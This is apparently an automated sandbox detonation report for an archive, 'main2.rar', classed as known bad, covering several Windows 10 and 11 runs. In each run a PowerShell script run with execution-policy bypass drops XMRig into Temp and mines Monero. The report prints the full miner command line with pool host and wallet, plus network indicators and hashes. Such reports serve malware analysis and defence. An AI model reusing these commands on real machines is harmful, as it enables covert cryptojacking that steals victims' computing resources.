Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-25 15:43
Signatures
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:45
Platform
win11-20240426-en
Max time kernel
1795s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5036 wrote to memory of 3980 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5036 wrote to memory of 3980 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.11:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w3yhihft.fkb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:17
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1772s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4512 wrote to memory of 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4512 wrote to memory of 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5lmwpgql.fhr.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:30
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1756s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2092 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2092 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| NL | 52.111.243.30:443 | | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t5b30pwy.s3x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:31
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1783s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 508 wrote to memory of 5044 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 508 wrote to memory of 5044 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
Files
memory/508-3-0x00007FF864DF3000-0x00007FF864DF4000-memory.dmp
memory/508-5-0x000001DDC5D70000-0x000001DDC5D92000-memory.dmp
memory/508-8-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/508-9-0x000001DDDE580000-0x000001DDDE5F6000-memory.dmp
memory/508-10-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsisydro.ndb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/508-25-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/508-48-0x000001DDC5F40000-0x000001DDC5F52000-memory.dmp
memory/508-61-0x000001DDC5F30000-0x000001DDC5F3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5044-90-0x000001FF8D930000-0x000001FF8D950000-memory.dmp
memory/5044-91-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/508-93-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/5044-92-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/508-94-0x00007FF864DF3000-0x00007FF864DF4000-memory.dmp
memory/508-95-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/508-96-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp
memory/5044-97-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-98-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-99-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-100-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-101-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-102-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-103-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-104-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-105-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-106-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-107-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-108-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-109-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-110-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-111-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-112-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-113-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-114-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-115-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-116-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-117-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-118-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-119-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-120-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-121-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-122-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-123-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-124-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-125-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-126-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-127-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-128-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-129-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-130-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-131-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-132-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-133-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-134-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-135-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-136-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-137-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-138-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-139-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-140-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-141-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-142-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-143-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-144-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-145-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-146-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-147-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-148-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-149-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-150-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-151-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-152-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-153-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-154-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-155-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-156-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
memory/5044-157-0x00007FF741A70000-0x00007FF7426A3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:33
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1767s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3012 wrote to memory of 3600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3012 wrote to memory of 3600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3012-0-0x00007FFC3FCC3000-0x00007FFC3FCC5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oqfyimuh.yng.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3012-9-0x0000020F77570000-0x0000020F77592000-memory.dmp
memory/3012-10-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp
memory/3012-11-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp
memory/3012-12-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp
memory/3012-14-0x0000020F77600000-0x0000020F77612000-memory.dmp
memory/3012-15-0x0000020F775E0000-0x0000020F775EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3600-46-0x0000020DC56B0000-0x0000020DC56D0000-memory.dmp
memory/3600-47-0x0000020DC6FE0000-0x0000020DC7000000-memory.dmp
memory/3600-48-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-49-0x0000020DC7000000-0x0000020DC7020000-memory.dmp
